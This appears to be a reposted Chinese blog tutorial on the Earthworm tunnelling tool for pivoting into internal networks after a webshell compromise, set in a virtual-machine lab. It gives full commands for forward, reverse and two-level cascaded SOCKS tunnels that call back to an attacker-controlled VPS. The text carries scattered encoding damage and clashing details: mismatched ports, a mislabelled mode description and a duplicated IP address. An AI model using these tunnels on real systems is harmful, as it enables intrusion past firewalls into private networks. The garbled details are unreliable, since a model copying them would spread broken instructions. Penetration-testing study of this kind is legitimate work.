文章目錄
1. 一級代理:
2. 二級代理(一):
3. 二級代理(二):
1.1 場景:
1.2 網(wǎng)絡(luò)拓?fù)鋱D:
1.3 說明:
1.4 實(shí)驗(yàn)過程:
2.1 場景:
2.2 網(wǎng)絡(luò)拓?fù)鋱D:
2.3 說明:
2.4 實(shí)驗(yàn)過程:
3.1 場景:
3.2 網(wǎng)絡(luò)拓?fù)鋱D:
3.3 說明:
3.4 實(shí)驗(yàn)過程:
1. 場景:
2. 網(wǎng)絡(luò)拓?fù)鋱D:
3. 說明:
4. 實(shí)驗(yàn)過程:
一���、環(huán)境準(zhǔn)備:
二、工具:
三�、概念:
四��、學(xué)習(xí)目的:
五、ew(Earthworm)介紹:
六�、ew(Earthworm)使用說明:
七�、ew(Earthworm)正向代理(適用于被控服務(wù)器擁有一個(gè)公網(wǎng)IP):
八���、ew(Earthworm)反向代理:
一�、環(huán)境準(zhǔn)備:
關(guān)閉靶機(jī)電腦的防火墻及病毒和威脅防護(hù)的實(shí)時(shí)防護(hù)。
開啟內(nèi)網(wǎng)主機(jī)的遠(yuǎn)程桌面�����。
二�、工具:
ew(Earthworm)內(nèi)網(wǎng)穿透工具
proxifier代理工具客戶端
三、概念:
內(nèi)網(wǎng)滲透不光只是反彈一個(gè)shell�����,反彈一個(gè)端口�����,我們更需要對內(nèi)網(wǎng)進(jìn)行更深一步的掃描和滲透�,這時(shí)候就需要找到一個(gè)代理服務(wù)器��,充當(dāng)外網(wǎng)和內(nèi)網(wǎng)數(shù)據(jù)轉(zhuǎn)發(fā)的節(jié)點(diǎn)�,通過這個(gè)被我們控制的服務(wù)器���,把所在網(wǎng)段的流量轉(zhuǎn)發(fā)到公網(wǎng)(互聯(lián)網(wǎng))���。
所以出現(xiàn)了反彈代理,也叫反彈socket�����。
四�����、學(xué)習(xí)目的:
在我們進(jìn)行滲透測試過程中���,獲得了目標(biāo)服務(wù)器的getshell權(quán)限后�����,要對內(nèi)網(wǎng)其它服務(wù)器或者主機(jī)進(jìn)一步滲透;這樣的話����,需要對其他主機(jī)進(jìn)行信息收集����,端口�、服務(wù)探測及漏洞掃描等操作。
進(jìn)行這樣操作����,只進(jìn)行反彈shell和端口轉(zhuǎn)發(fā)已經(jīng)不能滿足需求�,需要進(jìn)一步進(jìn)行反彈代理����,通過我們控制的目標(biāo)服務(wù)器��,把目標(biāo)服務(wù)器作為代理服務(wù)器����,充當(dāng)外網(wǎng)和內(nèi)網(wǎng)數(shù)據(jù)轉(zhuǎn)發(fā)的節(jié)點(diǎn)����,把所在內(nèi)網(wǎng)網(wǎng)段的流量引出到公網(wǎng),這樣的話,就方便我們對目標(biāo)服務(wù)器所在內(nèi)網(wǎng)網(wǎng)段的其他主機(jī)進(jìn)行探測及漏洞利用了���。
五、ew(Earthworm)介紹:
EW 是一套便攜式的網(wǎng)絡(luò)穿透工具,具有 SOCKS v5服務(wù)架設(shè)和端口轉(zhuǎn)發(fā)兩大核心功能,可在復(fù)雜網(wǎng)絡(luò)環(huán)境下完成網(wǎng)絡(luò)穿透�。
該工具能夠以“正向”��、“反向”、“多級級聯(lián)”等方式打通一條網(wǎng)絡(luò)隧道,直達(dá)網(wǎng)絡(luò)深處�����,用蚯蚓獨(dú)有的手段突破網(wǎng)絡(luò)限制���,給防火墻松土����。
工具包中提供了多種可執(zhí)行文件,以適用不同的操作系統(tǒng),Linux����、Windows��、MacOS、Arm-Linux 均被包括其內(nèi)。
六����、ew(Earthworm)使用說明:
該工具共有 6 種命令格式(ssocksd�����、rcsocks����、rssocks、lcx_slave���、lcx_listen、lcx_tran)����。
D:\ew>ew_for_Win.exe -h
版本:free1.2
./xxx ([-options] [values])*
選項(xiàng) :
例如:./xxx -s ssocksd -h
-s 指定工作模式���。工作模式支持如下:ssocksd , rcsocks , rssocks ,lcx_listen , lcx_tran , lcx_slavessocksd 創(chuàng)建正向socks代理服務(wù)端����,監(jiān)聽在本地�����,直接把當(dāng)前環(huán)境socks代理出去。rssocks 創(chuàng)建反向socks代理服務(wù)端rcsocks 反向socks代理客戶端lcx_tran 正向tcp端口轉(zhuǎn)發(fā),監(jiān)聽在本地lcx_slave 反向tcp轉(zhuǎn)發(fā)客戶端lcx_listen 反向tcp服務(wù)端-l listenport為服務(wù)器打開一個(gè)監(jiān)聽端口��。
-d refhost 設(shè)置反射主機(jī)地址���。
-e refport 設(shè)置反射端口�。
-f connhost 設(shè)置連接主機(jī)地址。
-g connport 設(shè)置連接端口。
-h help 顯示幫助文本�����,通過添加 -s 參數(shù)����,您還可以查看更詳細(xì)的幫助����。
-a about 顯示關(guān)于頁面
-v version 顯示版本。
-t usectime 設(shè)置超時(shí)的毫秒數(shù)����。 默認(rèn)的值為 1000
可以參考:http://rootkiter.com/EarthWorm/
七�、ew(Earthworm)正向代理(適用于被控服務(wù)器擁有一個(gè)公網(wǎng)IP):
1. 場景:
目標(biāo)網(wǎng)絡(luò)邊界服務(wù)器存在公網(wǎng)IP且可任意開監(jiān)聽端口��。
| 角色 | 系統(tǒng) | 網(wǎng)卡 | IP(網(wǎng)段) |
|---|
| 攻擊機(jī) | windows10虛擬機(jī) | NAT | 192.168.100.151 |
| 被控主機(jī)1 | windows08虛擬機(jī) | NAT
VMnet1 | 192.168.100.158(公網(wǎng)IP)
172.16.10.10 |
| 內(nèi)網(wǎng)主機(jī) | windows03虛擬機(jī) | VMnet1 | 172.16.10.11 |
2. 網(wǎng)絡(luò)拓?fù)鋱D:
3. 說明:
正向代理是服務(wù)器開放監(jiān)聽端口����,客戶端(攻擊者)主動(dòng)連接服務(wù)器的端口��。
適用于被控服務(wù)器擁有一個(gè)公網(wǎng)IP��。
4. 實(shí)驗(yàn)過程:
1、在被控主機(jī)使用ew打開一個(gè)監(jiān)聽端口:
命令:
ew_for_Win.exe -s ssocksd -l 6666
-s 指定工作模式
ssocksd 創(chuàng)建正向socks代理服務(wù)端��,監(jiān)聽在本地�,直接把當(dāng)前環(huán)境socks代理出去
-l listenport為服務(wù)器打開一個(gè)監(jiān)聽端口
2、查看監(jiān)聽端口是否打開���,可以看出監(jiān)聽端口已經(jīng)打開:
3、使用proxifier代理工具客戶端連接ew(Earthworm)的正向連接服務(wù)端:
在進(jìn)行測試時(shí)可以出現(xiàn)無法連通的現(xiàn)象�,這時(shí)需要在【被控主機(jī)1】的ew命令行里面敲一下回車鍵:
4��、在攻擊機(jī)上面連接被控服務(wù)器所在內(nèi)網(wǎng)段的內(nèi)網(wǎng)主機(jī)172.16.10.11:
八、ew(Earthworm)反向代理:
1. 一級代理:
1.1 場景:
目標(biāo)網(wǎng)絡(luò)邊界不存在公網(wǎng)IP����,能夠訪問內(nèi)網(wǎng)資源��,可以訪問公網(wǎng),需要通過反彈方式創(chuàng)建 socks 代理��。
| 角色 | 系統(tǒng) | 網(wǎng)卡 | IP(網(wǎng)段) |
|---|
| 攻擊機(jī) | windows10虛擬機(jī) | NAT | 192.168.100.151 |
| 攻擊者的公網(wǎng)vps | windows10虛擬機(jī) | NAT | 192.168.100.152 |
| 被控主機(jī)1 | windows08虛擬機(jī) | NAT
VMnet1 | 192.168.100.158
172.16.10.10 |
| 內(nèi)網(wǎng)主機(jī) | windows03虛擬機(jī) | VMnet1 | 172.16.10.11 |
1.2 網(wǎng)絡(luò)拓?fù)鋱D:
1.3 說明:
反向代理是客戶端開發(fā)端口���,服務(wù)器連接客戶端�。
適用于目標(biāo)機(jī)器沒有公網(wǎng)IP�,但可訪問內(nèi)網(wǎng)資源。
1.4 實(shí)驗(yàn)過程:
1、在攻擊者的公網(wǎng)vps上添加轉(zhuǎn)接隧道���,將6666收到的代理請求轉(zhuǎn)交給反連8888端口的被控服務(wù)器:
命令:
ew_for_Win.exe -s rcsocks -l 6666 -e 8888
-s 指定工作模式
rcsocks 反向socks代理客戶端
-l listenport在代理客戶端設(shè)置監(jiān)聽端口,將6666收到的 代理請求 轉(zhuǎn)交給反連8888端口的被控服務(wù)器����。
-e refport設(shè)置反彈端口����,用于接收被控服務(wù)器反彈過來的代理流量���。
2、在被控服務(wù)器上啟動(dòng)SOCKS v5服務(wù)并反彈到公網(wǎng)vps主機(jī)的8888端口
:
命令:
ew_for_Win.exe -s rssocks -d 192.168.100.152 -e 8888
-s 指定工作模式
rssocks 創(chuàng)建反向socks代理服務(wù)端
-d refhost設(shè)置反彈主機(jī)地址(IP)����。
-e refport設(shè)置反彈端口���,反彈給公網(wǎng)vps開啟的8888端口����。
3����、在公網(wǎng)vps出現(xiàn)以下界面,說明連接成功:
4��、使用proxifier代理工具客戶端連接公網(wǎng)vps上ew(Earthworm)的監(jiān)聽的端口:
在進(jìn)行測試時(shí)可以出現(xiàn)無法連通的現(xiàn)象����,這時(shí)需要在【攻擊者的公網(wǎng)vps】的ew命令行里面敲一下回車鍵:
5����、在攻擊機(jī)上面連接被控服務(wù)器所在內(nèi)網(wǎng)段的內(nèi)網(wǎng)主機(jī)172.16.10.11:
2. 二級代理(一):
2.1 場景:
在獲得邊界服務(wù)器【被控主機(jī)1】的webshell后,通過橫向移動(dòng)到內(nèi)網(wǎng)環(huán)境1中的【被控主機(jī)2】��,發(fā)現(xiàn)【被控主機(jī)2】同時(shí)處于另一個(gè)內(nèi)網(wǎng)環(huán)境2中����,但【被控主機(jī)2】所處的內(nèi)網(wǎng)環(huán)境2無法訪問公網(wǎng),公網(wǎng)也無法訪問【被控主機(jī)2】所在內(nèi)網(wǎng)環(huán)境2 ,【被控主機(jī)2】卻可以單向訪問【被控主機(jī)1】,這時(shí)需要把【被控主機(jī)2】所在的內(nèi)網(wǎng)環(huán)境2的流量代理出來�。
| 角色 | 系統(tǒng) | 網(wǎng)卡 | IP(網(wǎng)段) |
|---|
| 攻擊機(jī) | windows10虛擬機(jī) | NAT | 192.168.100.151 |
| 攻擊者的公網(wǎng)vps | windows10虛擬機(jī) | NAT | 192.168.100.152 |
| 被控主機(jī)1 | windows08虛擬機(jī) | NAT
VMnet1 | 192.168.100.158
172.16.10.10 |
| 被控主機(jī)2 | windows08虛擬機(jī) | VMnet1
VMnet2 | 172.16.10.11
10.1.1.1 |
| 內(nèi)網(wǎng)主機(jī) | windows03虛擬機(jī) | VMnet1 | 172.16.10.11 |
2.2 網(wǎng)絡(luò)拓?fù)鋱D:
2.3 說明:
反向代理是客戶端開發(fā)端口����,服務(wù)器連接客戶端����。
適用于目標(biāo)機(jī)器沒有公網(wǎng)IP,但可訪問內(nèi)網(wǎng)資源。
2.4 實(shí)驗(yàn)過程:
1�����、在公網(wǎng)vps添加轉(zhuǎn)接隧道�����,將6666端口收到的代理請求流量轉(zhuǎn)交給反連8888端口的被控主機(jī):
命令:
ew_for_Win.exe -s rcsocks -l 6666 -e 8888
-s 指定工作模式
rcsocks 反向socks代理客戶端
-l listenport在代理客戶端設(shè)置監(jiān)聽端口���,將6666收到的 代理請求 轉(zhuǎn)交給反連8888端口的被控服務(wù)器�����。
-e refport設(shè)置反彈端口�,用于接收被控服務(wù)器反彈過來的代理流量。
2����、在被控服主機(jī)1上啟動(dòng)監(jiān)聽本機(jī)端口9999���,并將9999端口接收到的代理流量���,轉(zhuǎn)發(fā)給攻擊者的公網(wǎng)vps的8888端口:
命令:
ew_for_Win.exe -s lcx_tran -l 被控主機(jī)1本機(jī)端口 -f 攻擊者的公網(wǎng)vps_IP -g 8888ew_for_Win.exe -s lcx_tran -l 9999 -f 192.168.100.152 -g 8888-s 指定工作模式
rssocks 創(chuàng)建反向socks代理服務(wù)端
-l listenport在被控主機(jī)1上設(shè)置監(jiān)聽端口9999����,將9999收到的 代理請求 轉(zhuǎn)交給攻擊者的公網(wǎng)vps的8888端口��。
-f connhost 設(shè)置連接主機(jī)地址(IP)����。
-g connport 設(shè)置連接端口���。
這個(gè)命令的意思就是���,把本機(jī)9999接收到的代理流量����,轉(zhuǎn)發(fā)到攻擊者公網(wǎng)vps的192.168.100.152的8888端口上��。
3、在被控主機(jī)2啟動(dòng)SOCKS v5代理服務(wù)端���,并反彈到被控主機(jī)1的8888端口 :
ew_for_Win.exe -s rssocks -d 172.16.10.10 -e 9999
-s 指定工作模式
rssocks 創(chuàng)建反向socks代理服務(wù)端
-d refhost設(shè)置反彈主機(jī)地址(IP)。
-e refport設(shè)置反彈端口,反彈給公網(wǎng)vps開啟的8888端口�����。
這個(gè)命令的意思就是在被控主機(jī)2啟動(dòng)SOCKS v5代理服務(wù)端����,把本機(jī)的代理流量反向代理到被控服務(wù)器1的9999端口�����。
4����、使用proxifier代理工具客戶端連接公網(wǎng)vps上ew(Earthworm)的監(jiān)聽的端口:
5�����、在攻擊機(jī)上面連接第二級內(nèi)網(wǎng)被控主機(jī)所在內(nèi)網(wǎng)段的內(nèi)網(wǎng)主機(jī)10.1.1.2:
3. 二級代理(二):
3.1 場景:
在獲得邊界服務(wù)器【被控主機(jī)1】的webshell后��,發(fā)現(xiàn)被控主機(jī)1沒有公網(wǎng)IP,但處于邊界的【被控主機(jī)1】可訪問公網(wǎng)��;攻擊者通過橫向移動(dòng)到內(nèi)網(wǎng)環(huán)境1中的【被控主機(jī)2】��,發(fā)現(xiàn)【被控主機(jī)2】同時(shí)處于另一個(gè)內(nèi)網(wǎng)環(huán)境2中����,但【被控主機(jī)2】所處的內(nèi)網(wǎng)環(huán)境2無法訪問公網(wǎng)����,公網(wǎng)也無法訪問【被控主機(jī)2】所在內(nèi)網(wǎng)環(huán)境2 ,但處于邊界的【被控主機(jī)1】卻可以單向訪問【被控主機(jī)2】所處的內(nèi)網(wǎng)環(huán)境2�,這時(shí)需要把【被控主機(jī)2】所在的內(nèi)網(wǎng)環(huán)境2的流量代理出來���。
| 角色 | 系統(tǒng) | 網(wǎng)卡 | IP(網(wǎng)段) |
|---|
| 攻擊機(jī) | windows10虛擬機(jī) | NAT | 192.168.100.151 |
| 攻擊者的公網(wǎng)vps | windows10虛擬機(jī) | NAT | 192.168.100.152 |
| 被控主機(jī)1 | windows08虛擬機(jī) | NAT
VMnet1 | 192.168.100.158
172.16.10.10 |
| 被控主機(jī)2 | windows08虛擬機(jī) | VMnet1
VMnet2 | 172.16.10.11
10.1.1.1 |
| 內(nèi)網(wǎng)主機(jī) | windows03虛擬機(jī) | VMnet1 | 10.1.1.2 |
3.2 網(wǎng)絡(luò)拓?fù)鋱D:
3.3 說明:
反向代理是客戶端開發(fā)端口�,服務(wù)器連接客戶端����。
適用于目標(biāo)機(jī)器沒有公網(wǎng)IP����,但可訪問內(nèi)網(wǎng)資源。
3.4 實(shí)驗(yàn)過程:
1、在攻擊者的公網(wǎng)vps添加轉(zhuǎn)接隧道���,通過ew的lcx_listen模塊監(jiān)聽本機(jī)的6666端口,把6666端口接受到的代理請求,轉(zhuǎn)發(fā)到反連8888端口的主機(jī):
命令:
ew_for_Win.exe -s lcx_listen -l 6666 -e 8888
-s 指定工作模式
lcx_listen 反向tcp服務(wù)端
-l listenport在代理客戶端設(shè)置監(jiān)聽端口���,將6666收到的 代理請求 轉(zhuǎn)交給反連8888端口的被控服務(wù)器。
-e refport設(shè)置反彈端口,用于接收被控服務(wù)器反彈過來的代理流量���。
2、在內(nèi)網(wǎng)環(huán)境2中的【被控主機(jī)2】上通過ssocksd模塊,開啟正向代理服務(wù),通過ssocksd模塊監(jiān)聽【被控主機(jī)2】本機(jī)的9999端口����,通過正向代理���,把外流量引向內(nèi)網(wǎng):
命令:
ew_for_Win.exe -s ssocksd -l 9999
-s 指定工作模式
ssocksd 創(chuàng)建正向socks代理服務(wù)端���,監(jiān)聽在本地�,直接把當(dāng)前環(huán)境socks代理出去
-l listenport為服務(wù)器打開一個(gè)監(jiān)聽端口
3、在內(nèi)網(wǎng)環(huán)境1中的被控主機(jī)1運(yùn)行以下命令�,通過ew的lcx_slave流量轉(zhuǎn)發(fā)模塊�,將正向連接到攻擊者的公網(wǎng)vps的8888端口�����,而獲得的代理請求流量����,轉(zhuǎn)發(fā)給內(nèi)網(wǎng)環(huán)境2的【被控主機(jī)2】�,從而獲得內(nèi)網(wǎng)環(huán)境2的內(nèi)網(wǎng)流量:
ew_for_Win.exe -s lcx_slave -d 攻擊者的公網(wǎng)vps_IP -e 8888 -f 處于2級內(nèi)網(wǎng)的被控主機(jī) -g 9999
ew_for_Win.exe -s lcx_slave -d 192.168.100.152 -e 8888 -f 172.16.10.11 -g 9999
-s 指定工作模式
lcx_slave 反向tcp轉(zhuǎn)發(fā)客戶端
-d refhost設(shè)置反彈主機(jī)地址(IP)。
-e refport設(shè)置反彈端口,反彈給公網(wǎng)vps開啟的8888端口
-f connhost 設(shè)置連接主機(jī)地址
-g connport 設(shè)置連接端口
4�����、使用proxifier代理工具客戶端連接公網(wǎng)vps上ew(Earthworm)的監(jiān)聽的端口:
5�、在攻擊機(jī)上面連接第二級內(nèi)網(wǎng)被控主機(jī)所在內(nèi)網(wǎng)段的內(nèi)網(wǎng)主機(jī)10.1.1.2:
文章來源:https://blog.csdn.net/weixin_45588247/article/details/120238795
該文章在 2023/10/23 18:48:34 編輯過
400 186 1886
